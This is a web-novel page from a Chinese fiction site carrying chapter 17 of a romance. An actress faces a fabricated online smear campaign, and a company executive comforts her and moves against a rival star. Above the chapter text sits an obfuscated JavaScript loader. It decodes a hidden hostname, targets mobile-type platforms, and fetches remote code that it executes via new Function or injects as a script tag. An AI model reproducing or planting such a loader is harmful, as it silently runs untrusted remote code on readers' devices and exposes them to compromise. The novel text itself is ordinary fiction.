98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一章

第17章 陷入舆论风波(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

连着拍了几天夜戏,许晚霜每天回到酒店几乎是沾床就睡,也不知睡了多久,一觉醒来,睁开迷蒙的双眼,就看到悦悦在床尾正襟危坐,一脸焦急,眉毛都快拧成麻花状了。

“怎么了,悦悦?”

“姐!怎么办?你上热搜了!”看到许晚霜终于醒了,悦悦着急地站起来。

上热搜不是应该高兴才对吗?许晚霜皱皱眉。

“姐,热搜上通篇都是你的负面新闻,说你在片场耍大牌,参加活动时摆冷脸,对其他演员翻白眼……”

许晚霜接过悦悦递过来的手机,几乎数十条罪状占满了手机屏幕,而每条热搜的词条后都有一个“爆”字,也不知道这些新闻到底发酵了多长时间,点进去查看,居然还有各种照片和视频。

下面的评论区更是不堪入目,讽刺的、挖苦的、落进下石的评论纷至沓来……“表面一套背后一套说的就是她咯!真不敢相信她居然能在娱乐圈蹦跶那么久!”,“没演技,又没人品,趁早滚出娱乐圈吧!”,“还妄想和我家华jiejie争咖位,去死吧!”

许晚霜不敢再继续看下去了,关了手机,心里满是委屈,“哪有这回事!”那阵酸楚涌上心头,连声音也莫名带了哭腔,“这些视频里的事情根本就没发生过!”

待她平复情绪后,仔细放大了图片观察,发现只是一个很模糊的侧影,根本就不是她自己,还有几个视频,根本也是胡乱剪辑的。

很明显,这次爆假料的人是有备而来,并且故意收集这些假证据,目的就是想让许晚霜的风评败坏。

许晚霜拿起手机想要给雯姐打电话,却发现她已经闪了十几个电话过来了,只是因为自己在睡觉,手机开了禁音,没接听到。

“喂,晚霜,热搜你看了吧?”电话刚拨通,雯姐就迅速接了,她做事一贯雷厉风行,但碰到这样大的事情也有些着急。

“看了。”许晚霜开口有些沉重。

“我这边会让公司的人出面去交涉,把全网的热搜降下来,并且紧急联系公关处理这件事,”雯姐语气虽火急火燎,但思路却很清晰,还不忘安慰许晚霜,“晚霜,你呢,别太担心,这次的事是有人故意黑你,目前不知道是对家买的热搜还是有人蓄意报复,等风波下去了我们把幕后的人揪出来!”

这还是出道以来许晚霜遇到的最大的一次事故,现在的她仿佛置身舆论漩涡的中心,稍不注意,就会被卷入万丈深的海底。

许晚霜点点头,声音已经有些说不出,“好……”

雯姐挂了电话,脸上却是一副忧心忡忡,许晚霜是个乖孩子,从她出道以来,基本上没有什么负面新闻,这孩子礼貌得体,也不爱出风头,在娱乐圈更是没有什么得罪的人,现在有人拿她的事大做文章,估计是看不惯她最近拿了新代言风头正盛。

手机屏幕亮了一下,是周星漾发来的微信,〔jiejie,热搜的新闻我看了,你别在意,他们都是乱编的!我相信你!〕接着,他还发了一个抱抱的表情。

被人安慰,许晚霜心里好受一点,于是回复了他一个摸头的表情。

周谦的电话也打了过来,许晚霜清了清有些沉重到喑哑的嗓子,“喂……”

“……你没事吧?”周谦沉默了两秒,似乎在想合适的措词。

周谦应该也看到了,不知道他对八卦新闻里对她的描述性词语作何感想,“耍大牌!”、“摆架子!”、“翻白眼!”,明明几天前的早晨还在一起吃早餐,现在却发现这个女人身上还贴着这些令人讨厌的词条,他是会就此厌恶她还是继续相信她呢?

“没事……”许晚霜懂事答道。

“定位发给我,我来找你。”周谦似乎听出了许晚霜话语里的不对劲。

话还没说话,尹乐的电话已经拨过来了,许晚霜只能无奈地挂断与周谦的通话。

“宝贝,怎么回事?”尹乐还在上海拍戏,抽了空给她打电话关心她。

“不知道……”许晚霜确实没有头绪。

“别担心,相信清者自清。”尹乐曾经也陷入过舆论风波,对于许晚霜现在经历的事情也感同身受。

散完会后,偌大的办公室内只留下一个身着一袭笔挺西装的男人,两个小时的会议并没有让他感到一丝疲倦,反而连每一根头发丝都散发着一丝不苟的气质,他正在打电话,说了两句便被挂断,此时的他一脸肃穆,连眉峰也紧蹙了些。

“周、周总,出了什么事吗?……”王助理鲜少看到面前的总裁脸上呈现这样的表情,连问话也有些紧张。

“叫人查一下这些新闻的幕后发布者,看看能不能查出点有用信息。”周谦摘了眼镜,净白的指节揉了揉鼻梁上的xue位,试图保持清醒。

王助理不禁有些讶异,总裁递给他看的新闻页面上是一排娱乐新闻,清一色的是对某位当红女明星的指控,从来不关注娱乐新闻的总裁怎么会突然让他去做这件事?

除非另有隐情——直到他看到那位女明星的名字,这不是BlueStation刚刚全网宣发的终身代言人吗?BlueStation是百胜旗下的餐饮品牌,代言人深陷舆论,品牌方也会受牵连,一损则损,百胜自然也会有损失。

张助理不由得佩服面前这个做任何事都面面俱到的男人,他这几天为了拓展海外市场的事情忙得不可开交,早晨刚开了海外的线上视频会议,下午又针对国内餐饮品牌的战略开内部会议,会议结束后,又要分心处理品牌代言人的问题。

“好的,周总。”王助理不由得对面前的这位总裁肃然起敬,连声音都凛然了几分。

尹乐给许晚霜讲了很多她那个剧组的八卦,把许晚霜逗得稍微开心了一些,也算是暂时忘却了这件令她焦虑头疼的事情。

挂了电话,许晚霜才看到周谦又给她打了几个未接通的电话,她后知后觉正要拨过去,手机显示周谦的一条微信发过来了。

〔定位发给我,我过来。〕

几个字虽简短,不知为何,许晚霜却有些眼眶模糊。

或许是因为他敲击的这句话中每个字里的坚定,或许只是因为——他是周谦。

周谦来的时候,许晚霜正在天台吹冷风,她一只手托腮,半个身子倚在栏杆上,望着楼下川流不息的车流发呆,脑子里很乱,心里也因为那些网上的恶意评论而难过。

周谦的脚步声靠近,她也没察觉,直到他熟悉的声音开口,“在想什么?”

“在想……”许晚霜偏过头来,正好看到周谦那张熟悉的脸庞,他的眼眸里倒映的是自己的剪影,仿佛在这一刻,她就是他眼里的全世界。

许晚霜不禁怔了怔,这个男人,什么时候跟她这样熟稔了,是她说想要体验厨师职业,他便亲手教她做法餐;还是她随意发的一张图片想到了他,他便立刻赶到和她一起吃早餐;或者是她难过低落时,他停掉工作马上赶来她身边……

忽然有一种莫名的情愫在许晚霜的胸腔中流淌,直至眼眶泛红,连视线也变得模糊,“谢谢你啊……周谦。”

或许是出于熟悉、信任、或者其他,看着面前这个一身黑衣挺拔站立的男人,许晚霜突然很想在他面前展示自己情绪脆弱的一面。

她的眼泪大颗大颗地从眼眶边缘滑落,她只好用手背去擦拭,边哭又边自嘲道,“是不是…觉得我心理承受能力很差……遇到这点儿事情就哭……”

周谦沉默了一阵,然后定定地看着她,“加缪的书里说‘没有人天生就强、就弱或意志坚定。是后来才变强,后来才意志坚定。’”

周谦的话似乎有某种魔力,许晚霜抹了眼泪继续听他讲,只见他认真地看着自己,仿佛每个字都掷地有声,“你得允许自己有一些脆弱的时刻。”

这个男人安慰的话语总是这样润物细无声,那次看星空的夜晚如是,现在如是,许晚霜崩溃决堤的眼泪渐渐收住了,她的眼睛不由自主地去看周谦。

只见周谦做了个敞开怀抱的手势,朝她温柔微笑,“我想,你现在可能需要这个。”

“嗯……”许晚霜几乎没犹豫,直接起身投入他宽敞的怀抱,还是那阵熟悉的乌木的沉香味,在他的大衣里,许晚霜感受到的是不一样的氛围,不同于那次在小巷里被追捕,这次的拥抱很安心,很踏实。

就像雪地里的一座庇护的木屋,尽管外面天寒地冻,只要在屋子里,就能感受壁炉旁木柴燃烧的炽热,只要在他怀里,便不再惧怕其他,感受到的只有无尽的温暖。

许晚霜情不自禁地想要再和他近一些,两只手也搂住了他的腰,两个人就这样紧紧抱着,两具身体也贴得更密切。

许晚霜抱得很投入,丝毫没注意到周谦接了个电话。

“周总,那些娱乐新闻的爆料者使用的IP地址以及通讯设备都在国外,没办法追查到源头,不过倒有消息查到还有一位女明星私自雇水军趁这次舆论疯狂攻击许小姐……”王助理的电话打来汇报。

“是谁?”周谦语气冷冷。

“华馨垚。”

“那就先拿她开刀好了。”

“周总,您的意思是……”王助理明显感觉到电话里总裁的口气变得不客气。

“用娱乐圈的那套法子。”

王助理自然明白总裁说的话是什么意思,艺人与公司签了代言合同,利益虽有所捆绑,但针对于品德不端的艺人,公司是有权单方面宣布合约取消,并且要求艺人赔付巨额违约金赔偿。

正要挂电话时,周谦低头看了看怀中女孩微眨的睫毛,他忽然想到什么,嘴角勾起一个几不可查的弧度,“算了,查到她的私人电话,把她的电话发给我……”



上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间